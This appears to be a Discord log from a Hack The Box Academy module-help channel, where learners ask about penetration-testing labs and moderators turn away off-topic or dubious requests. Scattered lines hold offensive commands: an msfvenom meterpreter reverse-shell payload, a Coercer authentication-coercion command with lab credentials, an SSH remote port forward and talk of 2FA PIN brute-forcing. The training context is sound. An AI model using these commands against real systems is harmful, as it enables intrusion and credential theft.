#modules
you can literally just use a bootable to wipe the disk and get admin back but... anyways back to module topics
Where do we reach out about billing problems related to Academy?
Need some help? Learn how to reach the support team on Academy.
Please how can I learn to track
has anyone done the advanced xss & csrf skills assessment? that can help please?
What do you want to track?
ohhh i see thank you!
Like number or ip address
How does it work
Enter the IP and click on the button. You will then see the details
you're asking for something illegal my guy
i suggest stopping there
stop. asking.
@tall iron if things have been stolen, contact the local police
Resuming my CPTS path (end of footprinting module), if anyone's interested to learn our way together DM me!! i don't mind if you're ahead or still at the start!!
What module is this even for?
its a private ctf...
im not supposed to ask here aren't i?
can't help you mate 😄
That would be cheating
understood🫡
Guys
How to Change a Microsoft account password with Password and Email
No Code or gmail
@astral vault @bitter needle
Please help
change the password
do u know ur current password or?
It'll ask for verification
Yeah I know the current password but m not logged in to gmail
contact microsoft support, we can't help you
Can someone do it for me
microsoft support
its fishy the fact that u dont have access to ur gmail acc
If I give u the email and The current password can u change the password for me
no
I am trying to log in to gmail it's asking for verification
havent given any recovery email?
no trusted device?
Hello,
My name is Moksh and I'm a cybersecurity aspirant. I am in my early days of learning cybersecurity and I would love to know more about the cybersecurity space and the path to being an expert in this industry. I would love to pivot to cybersecurity. Any guidance(certifications or courses) towards my career path would be highly appreciated.
Thank you
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
best of luck 👆
Thank you for your response.
I’m genuinely interested in the offensive side of cybersecurity—particularly areas like penetration testing and ethical hacking. To build a strong foundation, I’ve been watching Professor Messer’s videos on YouTube covering CompTIA A+, Network+, and Security+, and I feel confident that I now have a solid grasp of the basics.
As I’m in the final year of my web development degree, I’ve been thinking that it would be highly beneficial to earn a recognized cybersecurity certification before graduating. Having a strong certification on my CV would not only validate my skills but also improve my chances of securing opportunities in the field after graduation.
It would be great if you could suggest any certifications that align with my interests and current level of experience.
Probs not best place for this @burnt talon this is for modules in the HTB academy...
#general #careers-and-certs perhaps ask in here? (not both)
I am really sorry for that
Okay I'll do that.
Thank you
no harm done 🙂
Hello group, hope you all are doing well! I am doing the exercises on Attacking Common Services - Medium. I got stuck at a point so I checked the solutions, and in the solutions it says to add the subdomain int-ftp.inlanefreight.gtb to hosts and then NMAP it, and it shows on their solution nmap that there is an FTP on port 30021. But it's closed on my VM. I assume maybe the service didn't power on correctly and would require a restart of the VM, but I was just curious if someone had the same experience or am I missing something
its not first time ive seen that on few modules, not done the attacking common one yet but if restarting the VM doesn't help, its most likely a bug -- report in #1234357888114364508
others can comment on it then if they think of a reason it could be happening... best way to get feedback I found
Yea will do it now, probably a one time thing, i dont assume no one reported it if it wasn't. This would def suck if happened on the exam, it took me an hour of enumeration until i gave up and saw that it was something outside of my control haha
Has anybody done the xss and csrf module, Im struggling to get my sqli payload to work on the last endpoint any help would be much appreciated!
if at first it doesn't appear, restart and restart again
Why don't you just check the solutions part? If you just want a hint, don't read everything, just a pointer or two to help you out. It's way faster than waiting here for someone to give you a hint here
I bought the module, dont have annual, I can read all the data at the fuzzed endpoint, I just can't get any sqlinjection I've tried everything, stacked queries, union, order-by etc.. everything
Hey, are cURL requests anonymous ?
No,
What do you mean by anonymous
why'd you even think that
generate the most amount of logs in the most obvious way more like it 
Can they be traced by the server?
yes
ohh someone has been curling something that they shouldn't have 😉 hahah
definitely not
just asking 😳
tbh it'd be hard to unintentionally break something with curl
Either way. Please keep it on topic. This is the channel for module support.
alr ty
can I dm you sparkling
I'm not able to help with modules at this time
ok
even if the operation is silent?
All requests that arrive to the server can be logged. This will include the ip that it arrived from/is going to
the silent just stops error messages from showing and other output, any request you make can always log your traffic
oh ok thanks
erratum I think ?
@storm elk
?
what's erratum?
@prisma wing if you are applying for a job and got a task assigned, don’t lie and do the task yourself.
Asking for help isn't lying, how fuckin rude
Well; it’s your task
We are not here to help you solve a task for a job interview. That would be cheating.
I understand your point, but asking for help isn't the same as cheating. Sometimes, discussing a problem or getting clarification on specific aspects of a task can help me approach it more effectively. It's about learning and improving, not bypassing the challenge.
Well, it’s your task for a job interview. You should be able to do it yourself. Check out the Wordpress module on Academy. Either way, this channel is not the channel for your question. If you want access to general chat, read and follow instructions of #welcome
It’s 3 steps.
I'm doing the pentesting in a nutshell module and I tried to wget linpeas from github on the virtual machine on my hackthebox account, but everytime i try to do that the connection times out.
Not currently as i have not been taught how to. Thank you, i will have a look at the wordpress module. So can i ask the same question in general then?
People will more than likely tell you the same as I did.
Okay noted, I'll try thanks again
Hey
Help me I can’t stop listening to early 2000 dad rock someone please save me
This isn't the place for that
where is the place for that
Hi
having some trouble with
Introduction to NoSQL Injection
Skills Assessment II. Anyone around for a pointer?
dm me
Windows lateral movement windows management instrumentation question three. Use WMI to get a reverse shell on SRV02. Helen is not even a admin with WMI permissions. Wondering if I should fuzz her password against the list of users and go that way. Not sure why the lab showed an example of somebody without those permissions to begin with.
Does it give you a "Pwn3d" in netexec?
You can run a PS b64 rev shell if you can execute commands remotely
Netexec for .52 just went and did nothing from what I remember . Sorry I walked away
did you find the answer ?
I can try it in a couple of minutes. Just finishing another exercise.
Taking a lunch break, but I’ll try again
please help me i have read the module 3 times and i don't find the answer: module/80/section/837 broken authentication What is one prominent issue with passwords?
This works. You can use whatever WMI tool you'd like
I am in trouble with the target of the "Packet Inception, Dissecting Network Traffic With Wireshark". I can connect to the machine with xfreerdp but it shows nothing, I mean it displays only a black screen. I searched about it in old logs and found I should press the space key in the black screen but it does not work for me. Could you give me some advice?
Please ignore this post, I realized that the blackscreen is a wallpaper of a linux VM. I misunderstood it was a Windows VM.
Anyone working on the Penetration Tester module and want to learn together DM me!!
Thank you W1ld
Hi. Someone knows if there's any kind of issue with 'inlanefreight.com'?; I cant access it
Module: whitebox attacks
Section: client side prototype pollution
Hello everyone!
Got stuck for a week around on this task.
Can I have some help?
from my cell phone, the website works
I’m having trouble Copy>Copy after I authenticate in the GET exercise in web request in order to find the flag
You can DM
What module is this for?
Web request module in Bug Bounty path
Is anyone working on Bug bounty
tell us what issue are you facing
I'm having trouble installing some tools. It's the attacking common applications module. The guide teaches "sudo pip3 install droopescan" and I get an error "error: externally-managed-environment" . There are other tools also, I cannot install pip3 tools for some reason. git clone doesn't work either btw, I cannot install the "requirements.txt" and the tool won't run at all.
i havent done the module but i have fixed pip errors before
there are usually 2 ways to do it
using pipx (this is global)
and using venv (using this you will need to go inside a python venv everytime and activate it)
for now install pipx and then try to install droopescan
I managed to install using pipx but it doesn't work either! When I try to run the tool it says some modules are missing, so doesn't work either.
did you try to install the missing modules 🤔
When I used "sudo pipx install droopescan" I couldn't even use the tool as it installed itself in the ROOT directory. When I used "pipx install droopescan" I try to use the tool but some modules are missing. When I try to install said modules, it won't let me I think it just gave me errors
https://github.com/SamJoan/droopescan/issues/72
it seems like an issue with the tool
wait here i guess someone may know :)
That's too bad, I say the course material should be re-evaluated :/ Do you happen to know any other Joomla scanner I could install with apt ?
i will try to see if i can run in venv
give me a sec
Alright, thanks a lot, man!
So it's the tool itself that is broken?
That's a shame :/ I've been banging my head trying to get it to work. If you happen to know any alternatives, please tell me 😄 And the material needs urgent updating.
Hello,
I have completed all but 2 of the questions for Android Fundamentals. (1) question 2 for Android Emulators: Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test).
and also
(2) question 2 for the Android Skills Assessment: Find the UID of the application com.android.settings. Use the command adb shell ls -l /full/path/ to inspect the file permissions and identify the application's UID from the output.
request assistance.
hey I'm having trouble with:
"command injections - bypassing blacklisted commands" https://academy.hackthebox.com/module/109/section/1038
"Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found."
(also not really sure how much I'm allowed to share of my progress for means of getting help with this?)
I am able to read the files in the home folder but nothing comes back for flag.txt
you can list the flag.txt?
sometimes, in command injection, you can use *, so instead of executing cat flag.txt you can execute cat flag*
it sometimes helps me in these situations
Are you looking at /home/ or /home/user
😉
Hello,
I actually try: https://academy.hackthebox.com/module/77/section/728
and I can't access to https://10.10.10.121 website on my workstation somebody can help me
@shadow grove don't spoil the module content
That ip is just an example: you won't be able to access it
It's there to show you can use the ip in the query, not just a domain name
How do I ask a question without asking the question?
The target you can access is the 10.129.x.x spawned target above the question
Are we getting "missions" on Academy now!?
The issue is that module is a walkthrough in and of itself. The only thing I can say is try resetting the lab, or making sure that the domain is in your hosts file correctly
I'll never be able to finish the whole content 🤦‍♂️
Thank you !
Footprinting Module > Oracle TNS Challenge/Skills. When running the .SH provided to download/install SQL Plus, it doesn't appear to install the tool itself, even though I can see the script working. I would like to finish the lab but I know this tool is needed.
v
run the script line by line instead of as a script
i've had issues where the tools/dependencies don't properly install
I'm working on the last part of the Advanced XSS & CSRF module's skill assessment.|| I can query the API but I cannot get a working injection other than a "something went wrong"||. Could someone help me on that?
@round parrot please refrain from spoiling info on labs from modules above tier 1; your screenshot contained passwords and such.
ok this then
a lot of broken modules or not updated for a while
still for some reason i can connect with ldapsearch with the creds but not with following the tutorial. it fails..
You're running with sudo yeah?
yes, tried it with and without
Best to always include the module and section. Your error seems clear though, it says connection refused.
lol. yes it does. quite clear. module Unconstrained Delegation - Users Kerb Attacks. But it shouldnt. since i get connection with ldapsearch. maybe the twist is that i cant add a record with that user..
Was looking at 'Python Library Hijacking'.
https://academy.hackthebox.com/module/51/section/1640
I think there is a mistake. It is said that if the SUID/SGID is assigned to a python script then we can do what we want (Wrong write permissions section)
But it's not the case, suid are ignored on scripts and in the box itself. If you changed permissions and put a SUID on the python script it doesn't work.
Even having a SUID on the python interpreter isn't working
The real and only method is having sudo permissions on the script
sudo
yeah i know, but the course is saying otherwise
you may be right. you should submit this to #1234357888114364508
Good evening. Working on Shells and Payloads - the live engagement. Within the first box you have to rdp to, i have minimized terminals that are running commands. I cannot figure out how to get them to be visible again. I've tried Super +W but my laptop tries to respond, and the vm does not. i swear i only show up with dumb problems.
There's a top task bar that should show them you also should be able to alt tab
Thanks. The top Taskbar isn't showing any of the things I minimized, and alt tab just tries to switch windows on my laptop. 😦
Maybe check the other workspaces theres a bunch of squares on the task bar they're different workspaces
Hint: think about what UID stands for and you should get the answer from that.
need help w dis in windows fundamentals module
i tried dir c:, tree c:, but im not sure wt im supposed to actually do
whats "non-standard" supposed to mean
can any1 help?
non-standard = directories that aren't normally there
in this case, would it be smth like searches or links??
that's not the c directory though 💀
huh
it is?
dir c: gives directory for c drive right??
.
right
im trying 😭
👆
did tht along w/ the directory name
i need the file contents of a directory
wdym?
i tried dir c:\ Academy
i got the directory im lookin for
its academy
but i need contents of da flag file stored in it
just use the command bro why you making modifications?
.
so get the contents
how?
thats the one i need
i tried everythin in section
have you tried: using the file explorer?
k i got name of flag file il do it now thx
apparently the ps command for dat was dis....i did smth similar but i think i missed smth
n then yes file explorer
i thought i saw where approximately how much time each module took. where can i find this information again so i can plan out my days in advance?
edit: i found it in modules if anyone else was wondering
broo in linux privilege escalation/logrotate how do you ||force logrotate||?
i tried using -f
permission denied (obviously)
im not sure what else to try
ive tried a few other ways i saw on google but nothing worked
I wouldn't base it completely off of that estimated time
there are modules rated for 8 hours that I finished in 2, while there are modules rated for 10 days that I finished in 20 
i understand. it's just nice to have a rough estimate
i'm just setting aside a few hours per day during/after work
but i have a goal in mind for when i want to finish the pentester path
should i just wait?
you can remove admin: or add the -username flag (might need two -s)
yea got it changed to 7300
and it worked, thanks!!
Module: Understanding Log Sources & Investigating with Splunk Section: Skills Assessment "Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe" I was able to get the answer but can someone DM for a quick sanity check regarding the question and possible ways of finding the solution easier? 🙏🏿 🙏🏿 🙏🏿 🙏🏿
Hi Guys has anyone completed hard lab of Enumerating Network with Nmap?
figured it out never mind)
I'm still looking for help in the last phase of Advanced XSS & CSRF module's Skill assessment. I got a tip from a helpful user but I'm not sure I'm still doing it correctly. Is the last phase supposed to be ||boolean-based||? I'm trying to be methodological in my approach but at this point I think I'm misunderstanding something, because my current approach is testing other skills to what the actual module is about.
No.
<@&861185840277487616>
I have the original short link they sent
Guys I started Tier 0 Meow and completed it, but can someone explain, what are open ports? What is 'nmap'? I felt like I got thrown in without some background.
It was fun but just trying to understand the inner workings
if you are unfamiliar with these terms, you should probably look into doing the Information Security Foundations skill path on HTB Academy
Ty
Now that you had a taste of it, you are ready to learn. That is the whole point
hey I am on the Pivoting, Tunneling, and Port Forwarding module,
I am trying to utilize a reverse shell with ligolo-ng,
I managed to move the reverse shell to the internal server but I cannot manage to gain a reverse shell from the windows host through the ubuntu server to my attacker host
I am a bit confused, is someone availabe for a little help 🙂
Good to know, thank you!
ey guys Good Afternoon, I need bit help here. Has anyone arrived here?
this is the last exercise of AI
hello guys
im doing the introduction to windows command line
and im facing some stupid issue
options in powershell have a colour similar to the terminal background ||at first i thought that options were invisible lol||
how to change the colour of the terminal background
so the options become easy to read
It's either under
Terminal or view
It's been a minute
It's mostly due to jumping to ps from another session which is causing some issues
eee marciello I'm almost going to complete the module 😉
Who's marciello?
you xD
Thats not my name? No "o" in sight
Module: AD attacks & Enumeration
Section: Skill Assessment 1
Question: submit cleartext password for t***** user.
I compromised the domain admin and got the final flag, but can't get cleartext password for that specific user, anyone available for a hint?
Research for: ||NetExec Low Privilege Modules||
Can I dm you?
Sure
Hello everyone,
I just finished learning all about networking, but now I’m not sure what to move on to next. I’m new to the cybersecurity space and don't know anyone in the field yet.
Can someone please guide me through the process and suggest what my next steps should be?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
actually you're right
i opened a bash terminal then ssh to the windows target
didn’t think that would cause such a problem
it's joke brother 🙂 already I have the module ready
almost
hi everyone! I've got one question - currently i'm at pivoting & tunneling module. How exactly rpivot works? is it only forwarding webserver to my attacking host (kali)? or can i even rdp to this victim server which contains webserver?
I kind of thought that it shouldn't. Would you mind if I DM you about this (are you familiar with the assessment?)?
Hey, i am on PIVOTING, TUNNELING, AND PORT FORWARDING - Remote/Reverse Port Forwarding with SSH section
I am trying to use ligolo-ng in order to get a reverse shell on the windows machine of the user victor (172.16.5.19) is not connected to the internet and there is no open port within it
this windows host is connected to the web01 ubuntu jump host
In the module they're doing it with ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
But I am wondering how to utilize it with ligolo
If someone can please assist me I will share screenshots to be more clear.
Thanks 🙂
yesssss omg I managed to do it after 5 hours
I guess typing my thoughts helps
can the flag be a word/sentence? as in:
HTB{word1_word2}? I'm new here ^-^
the flag is the whole HTB{word1_word2}
the flags I've found so far look like a string of random characters, but are there flags that look more like sentences/words then? Thanks in advance!
yes 🙂
hi, i need help with (Attacking Thick Client Applications)
a flag could be also like
Em0r!4L!_G00d_LUCK 🙂
Thanks! ^-^
Hi, can anyone help with skills assessment on injection attacks? I found how to execute js code and read files, but I have problems at the xpath injection stage.
ey guys how long have you been hacking?
I am on Shells & Payloads - The Live engagement, question 5. The remote host install of Metasploit does not contain the exploit, and there is no internet connection to get it from exploit-db. Am I missing something?
Probably better to ask in #red-team or something as Ligolo isn't covered in modules.
hi I'm trying to make sure I understand this section. who can I talk to in order to understand it better? I think if I explain it to someone else I will understand the material better. I also have some questions about the material.
can I DM someone? I don't need help with the questions as of right now
I just need help understanding the section
I completed two questions of section doing third
gonna get flag and then reread section
hi the section is telling me to login to the server to transfer a file to it via a specific protocol but the server isn't listening on that protocol
services don't always run on default ports
ok thanks
If rdp is open: sure
You're missing something; it's there. You can just use it
well, I ran some nmap scans and its not getting me any decent results. do I need to do a fancy scan?
i have no idea what you need to do
You didn't say what module and section my guy, so help is gonna be sparing
@fathom pendant That worked. Why would it be in there, but not come up in a search?
That i don't know
But it does exist

Web Server Pivoting with Rpivot
And I mentioned it earlier
That context was long lost
Hi!! Guys
Can speak in spanish?
This is an English only server; see #rules
Srry. Muy bad
I'll ask again later
I can't resolve my 1st lesson
[us-academy-3]-[10.10.14.169]-[htb-ac-uxkrp0utzq]-[~][*]$
Find IP:PORT
hey everyone, i need help. i am doing cpts and now i am in chapter 2, topic public exploits, in which i have been given a question. but i am getting this error using metasploit when i hit check:
" The service is running, but could not be validated. Authentication to Wordpress failed."
can anyone help me with that
Best to include the module and section you're doing
hello I was thinking something from the Penetration Testing Process
Page 2
in Academy Modules Layout you have to do just the fundamental modules it suggests Before moving on right ?
yes just have a look on them you will study those in detail later , rn follow the sequence
Ok so just read the page for now
Thought maybe it was asking the fundamentals, I guess I will do them somewhere in cpts path
@desert plume No one is going to outright tell you the answer. You can ask for a nudge if you're really stuck but you need to explain without spoiling content from modules above tier 0.
the answer is the flag lol im just asking how high the pin code is lol i dont want the flag
Hi. Im doing attacking enterprise network. when I try to upload zip from sharphound to bloodhound it just keep loading forever
As I said before, don't post content from modules above tier 0 it's against the rules. Simply ask your question without posting content.
It can be a Malware or It might be a genuine family man. @viscid osprey Referring to your question in #cpts
its not loading at all
Try running bloodhound with sudo
You need SharpHound version that is compatible with BloodHoundGUI
Try a legacy one
Which version of sharphound?
Try bloodhound-python or sharphound v1.1
i used the sharphound latest one as nt/authority on a computer object. I will try and update
OK. I'm working on the Final assessment for Broken Authentication. || I've gotten to the point where I have to brute force the 2fa pin. I know what information I need to filter out. I've generated the pins with 'seq'. However nothing is hitting for me. || Have I missed something?
I've used seq -w 0 9999 to generate the list of possible pins.
hi
hi again. I tried with sharphound v1.1 it didnt work either. my bloodhound version is 4.3.1
when running with sudo stuck here.
Hi there
Thank you ❤️
All gs
do you think using AI to help with learning, like reverse engineering code, is frowned upon?
guys, I'm in footprinting medium assessment and stuck
at a point i've got the access to target and 2 required creds
unable to move forward from there


Hey everyone, i am on GETTING STARTED MODULE, Using PUBLIC EXPLOITS SECTION. I am stuck, when i exploit target host using msf it says " the service is running but cannot be validated" means plugin require authentication but i have done all the things to get username and password all in vain. can somebody help me how should i get this done
Wireless network in network fundations. It’s not accepting 2.4GHz and I can’t close the module. Yes it’s tier0 and don’t know why it’s like this
I haven't worked through the module, so unfortunately I can't help you.
But if you have a question about a module, it is always a good idea to specify in which module, in which section and with which question you have a problem. This is the best way to find someone who can help you.
can you assist me in my problem kindly
Perhaps you have used the wrong exploit
thank you
didn't they provide username and pass in the page itself?
just be sure you read through completely they m8've mentioned some creds to use
Hello guys,
I'm practicing the last assessment in the password attacking module, when trying to download the backup.vhd file, I'm always getting a timeout, the ping to the server is OK, I've checked the tutorial for this assessment, and it should work. any idea? I'm using my own attacking Kali VM
I repeated the assessment quite recently. It timed out on the first time, but it then worked somehow.
If it was a SMB share, you can try
mget *
If persists, try a TCP VPN since that file is quite big
Great, I will try it, a quick question, if I want to go to CBBH/CPTS exam, how could I know which TCP/UDP VPN should use?
TCP is a safe bet, but someone who has attempted the exam can answer it better. I'm yet to sit the exam
I see, thanks!
Active Directory PowerView --> Enumerating AD Users --> Find the second user with a password in the description field. Submit the password as the answer. -->||Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}|| but none of the output is accepted as an answer. What did i miss?
Is the VPN extremely spotty for anyone else, I can connect but get booted off after a few sec?
thank you!
No probs here.
Ah alright it was that one
Okay, thanks!
Need some serious help... Firewall and IDS/IPS Evasion - Hard Lab. Struggling with this one a LOT. I assume I need to get to a point where the port is open as step one right?
source ports are your friend
lol, I gathered that in the first two minutes, it's the next four days that has me struggling 😄 Thanks for confirming that I am on the right track though 🙂 It is way too easy to overthink
the reading is important; maybe revisit that on tactics on what to do 😉
Hi - in Active Directory LDAP module, LDAP Overview, it discusses how to enumerate using ldap queries for " This query searches the domain for all administratively disabled accounts."
My question is - does this query and its output have any significance or is it just for demonstration purposes? I can't understand why this output would be something you would have interest in.
a disabled account can be interesting; but it's an example of what you can do
it also helps if, for example, you pilfered creds to ensure the user is active
Thank you, helpful.
I'm doing Linux Privilege Escalation - Logrotate and one of the preconditions for the exploit, logrotate running with elevated privileges, doesn't apply to the machine. The config file listed in the tutorial that sets the su for the process is not visible to the user I'm given. If somebody is familiar with this module: can I get a hint? ty
i had 0 issues with using logrotate to copy the file
I ran the logrotten exploit, it apparently did its thing, the "logrotate -f" command I used to trigger the rotation returned a permission denied error and I didn't receive the reverse shell.
Am I missing a step?
are you sure you're messing with the right file, first and foremost
Anyone a hint?
I found him but the found pass is not accepted as answer
I can't say I'm sure, I've tried 2 files. That's a good hint, I'll keep looking
was the most obvious of the two 🙂
Thank you!
i deleted the message previously for providing the direct hint; i suggest taking to dms for further help
are you sure you didn't accidentally copy additional whitespaces?
i did retype it, copy/paste. Didnt work.
That was the answer for me. Did you include the ? at the end?
Yes I did
Then try refresh the page and enter the same answer. I found that if the page has been open for too long it will say the answer is incorrect.
Didnt work, but! Logging out and in did work.
Thanks...kept me busy for more than a hour 🥲
do you want to know how to keep an idiot busy for a while?
Yes <<<
No
Do you want to know how to keep an idiot busy for a while?
...
Shouldnt the uid be a f integer !?
hello i am also stuck with MODERN WEB EXPLOITATION TECHNIQUES - SSRF Basic Filter Bypasses
Can you help ?
Thank you for the help 🙂 I had no option but to google it though. Found a post where people were saying it only works on the pwnbox 😦 Is this normal? Should I just be using the pwnbox for all networking stuff?
it absolutely doesn't "just work on pwnbox" lmao
i've gotten the answer on my own vm plenty
sometimes it's also a bit of patience after you identify the right port
I have a mundane problem... I'm often getting my solutions right, but not the expected end result, this is usually because I choose the wrong local IPs to connect to my target. Just now, I was working on the shells module with the live engagement, on the first host, i essentially did everything right, but i picked the wrong LHOST up to 3 times, which made me doubt what i was doing was the right thing. How do I validate I'm using the correct ip from ifconfig -a when connecting to my target?
Send me a DM
does the ip match the range of what you're connecting to
that's the most simplistic answer i can give
the live engagement has you attacking targets on a separate internal network that don't have access to the 10.129 range
that's the answer i needed
I was trying to use the local ip, the ip i got from the assignment, another one, but i was doing it aimlessly. using the correct IP range is actually a reason why to pick A over B 🙂 Thank you Marcie! that helps me a bunch
Yeah, another lesson.... I think the pwnbox just happened to work because it was a fresh restart. But then I reset everything, waited 10 minutes and tried again with the same results on both. The results just seem kinda random
Got it: need to "sudo -s", then run wpa_sycophant.
hey guys I am new here. anyone can help me get through Academy - DNS Zone Transfers? I found internal.inlanefreight.htb subdomain with DNS records. I tried every possible count they would want but without any success it always says incorrect answer. I tried 12, 11 you name it so if anyone knows how to get through this thingy I would be grateful.
Hi Where is the right room to ask help about labs ?
quick question on htb academy. when you finish a section and you go to the next ?module? / ?section? where do you see how long htb thinks it will take to do that module / section?
HTB only specifies times for the entire module, not for individual sections.
ahh ok. thanks!
If you need help with a module, it is helpful to specify the module, the section, and the question you are stuck on. Without this information, it will be difficult for anyone to help you.
how do you get access to speak in the htb off-topic general channel?
Hi thanks for the prompt answer. I am not sure what it was but now it miraculously works even on the main domain without trying subdomain first. Not really sure if there was some issue with the target machine or what but it just started to work. The question was regarding to Q1 under Academy - DNS Zone Transfers module.
Where I can see my account Identifier on HTB settings?
What is the name of the module?
follow #welcome
I follow
I think it was this?? Information Gathering - Web Edition
It say go to my setting my profile I dont see account Identifier
thanks!
Hey guys
This channel is for discussion of the various modules on the HTB platform, not for help with school.
How do i get permission to post in general? @cloud urchin
You have to follow the instructions in #welcome to gain access to most of the channels
Only two weeks in, but my advice is to completely forget about how long it should/would/is taking. Been in IT for 25 years, and this course really is a journey and not a destination 😄
Hello, I'm doing the using web proxies module and the spawn a target of a submodule seems broken, I try to ping/curl into the ip and it doesn't seem to work
Are you selecting the correct port?
hi , anyone can help? I am stuck at footprinting IMAP/POP3. The question is to Find the admin email address..
yes, yesterday I was progressing on the module and now spawning target doesn't seem to work
but if target spawning works for you it means that it is something on my pc
try to list all folders inside imaps ; )
it works on the vm provided by htb but not on my pc
anyways I'll do it on the vm
Hi
So confused
@inland oak Please take care not to post content from modules above tier 0
😦
hello guys
why is this not working
PS C:\Users\ahmad> Get-Alias | Where-Object { $_.Name -like 'Get-Content' }
PS C:\Users\ahmad>
i mean i know the name here would be something like cat since its an alias
but
PS C:\Users\ahmad> Get-Alias | Where-Object { $_.Name -like 'cat' }
CommandType Name Version Source
----------- ---- ------- ------
Alias cat -> Get-Content
PS C:\Users\ahmad>
here cat is the name but what is get-content
is it just a normal text
Hii
Are you looking for a Windows command that does what 'cat' does in Linux? If so just use type
That's right 👍🏻
its a simple question in one of sections in intro to windows command line
it just asks what cmdlet is cat alias of
besides the question i am curious why this didn't work
Get-Alias lists all aliases. Get-Content isn't an alias, it's a full cmdlet which is why you got nothing back. Cat is an alias of Get-Content, which is why it returned something for you.
yeah thx
Can someone help me get started?
I’m new and I’m trying to learn to code so help is appreciated
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
ehm hi in the Sliver module the error:
"rpc error: code = Unknown desc = implant timeout" happens a LOT i searched this channel a lot of people are facing it NO ONE suggested any solution, anything new? i cant execute binaries or aliases and this is annoying T_T
Anyone available for my question #modules message ?
Footprinting Module > Footprinting Lab-Medium. I'm trying to mount NFS share, but it just freezes and does this. I've made the directory on my attack machine.
Eventually times out with "connection refused". I can see there is an available share..
sudo is not root
Login & password for mrRobot plz ❤️
What?
Don't you need to specify the volume? ... nfs <target_ip>:/<volumeavailable> ...
Vulnhub mrRobot can't login
I've tried that.
sudo mount 10.10.15.170:/TechSupport ./target-NFS
10.10.15.170 being my attack machine.
IP should be target, just edited.
Srry my bad
read again why it works. sudo and root are not the same things
So I need root permission to map this? I'm new to all of this so all I have to go off of is the footprinting section and trying to google the right answers here.
hi it doesn't give me an error but I cannot connect via ssh on the Web Server Pivoting with Rpivot section of the Pivoting, Tunneling, and Port Forwarding module. This is for the last question. I tried nmaping it but that failed too because it scans all 1000 ports and none of them are open. I want to scan all 65,535 ports but I'm scared it will take forever and I don't know if that's really the right way to go because it says to SSH into it. Do I need to do a fancier nmap scan like a FIN scan or something?
hopefully I'm not spoiling anything
module link?
Sounds more like your target died, you're not on the VPN, or you're using the pwnbox at the same time while being connected to the VPN. Can you ping the target?
Algorithm Confusion anyone around i can DM for help ?
when i input the pem key in cyberchef i get invalid token
That sounds like a #challenges question, not a modules question. Unless that's a section in one of the modules
thats a section in the modules
Whats the module name then?
I’ll try again after I get lunch but good idea. It could have something to do with the wifi I was on
But good point. Thank you for the suggestion. I’ll try soon.
hey peeps, I am having some issues with coercing in order to get the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.
I am looking at module/232/section/2522. I know I am doing the correct command, but there seems to be some issues where lab env is concerned.
Command:
Coercer coerce -t 172.16.117.60 -l 172.16.117.30 -u 'htb-student' -p 'password' -d inlanefreight.local -v --always-continue --filter-pipe-name '\PIPE\lsass'
When I run my command, everything works fine, but no error shows in the form:
'[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.
Can someone help me with Firewall and IDS/IPS Evasion - Hard Lab? I've tried several types of scans, and I only ever find 2 ports, or the scans will take hours (The machine won't stay up long enough) I've tried adjusting the delay, max tries, etc. I have enumerated the http service I found with no luck. Been stuck on this for a while.
Source ports are your friend
Ill look into that, thanks
Check the reading; it refers to source ports and reasons 😉
Nice, thanks 😎 I think I'm on the right track now
Anyok
I have to say sorry. Earlier, I was asking why I couldn't connect to the spawned target. I forgot that I had configured my firewall to drop everything except some ports. 😛
hehe
Hey guys I’m switching fields into cyber security from medicine and my old laptop has died on me. Are MacBook pros suitable as an entry level device in cyber?
They're fine. But you may run into tool issues as most tools are built for amd x86_64 chips, and most recent mac pro chips are m1/2
Are there work arounds for this issue?
I mean you'd just have to find comparable tools
As that's more of a cpu level thing than it is a distro level thing
Different instruction sets
Awesome. Thanks for your help
I'm restarting my spawned target for the umpteenth time now for the Common Services Attacking FTP module. I know this one gives everyone a problem. It took like 5 retries for me to get the first non-standard port, and then i exhausted the users lists and password lists. I can't connect to the one non-standard port I've found anonymously (i've tried...lots). Looking through other people's posts it seems like there should be a second non-standard port open. I've tried a lot to find the other non-standard port, including looking for some specific ones, and I can't get a box to spawn that has a second non-standard open. Has this lab been updated or do I really still need that second non-standard port open. feel free to DM me if this is getting too into the weeds!
I did find one of the users (that answered question 2) and suspect that there is a second user; I've tried the provided password list with both usernames and got no dice.
There is another non standard port. Did it quite recently, and a full port scan revealed it to me.
ugh. I believe you. I just know this machine is also wonky, so half the time it only gives you standard open points. I think I'm on respawn 13 now, andd it reveals 1 open non-standard port.
i like my macbook a lot. It's at least unix so the terminal crossover with linux is helpful in that sense. It is not by any means necessary to learning nor will it make it easier. Like Marcie said the new chipset doesn't play with everything as easy but I haven't had much trouble these last few months since switching.
yeah . but the macbook is so expensive. 😄
that's the other thing.
I certainly didn't need this machine, but i like it a lot and the battery life is killer.
It's a nice computer objectively speaking. I'm sure someone will tell me Im wrong. But with Surface vs Macbook pro it's like a matter of preference imo
I just want a system I can customize, that’s it. Some of my friends say MacBooks are hard to customize. Is that true?
to an extent yeah, you're dealing with Apple's walled garden.
certainly not what you'd get using linux, but if you're doing HTB you probably wouldn't be connecting from your macbook. It's best to use a VM (I could be wrong) or the pwnbox with your web browser
What sort of customization are you thinking?
either way, if you're thinking you want to get into things deeply I'd look else where. Saves the money too.
Stuck on the last question of manipulating the model under introduction to red teaming. If anyone can give a hint on what to exactly look for that would be great
in Signature Wrapping Attack I've tried to inject my modified assertion in the original SAML payload like in the module, but it didn't work, I didn't beautify the code, can anyone help me?
Hey group, I am having an issue I cant figure out. On module Meterpreter Tunneling & Port Forwarding. Making a payload: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=8080 -f elf -o backupjob (running on the pivot host)
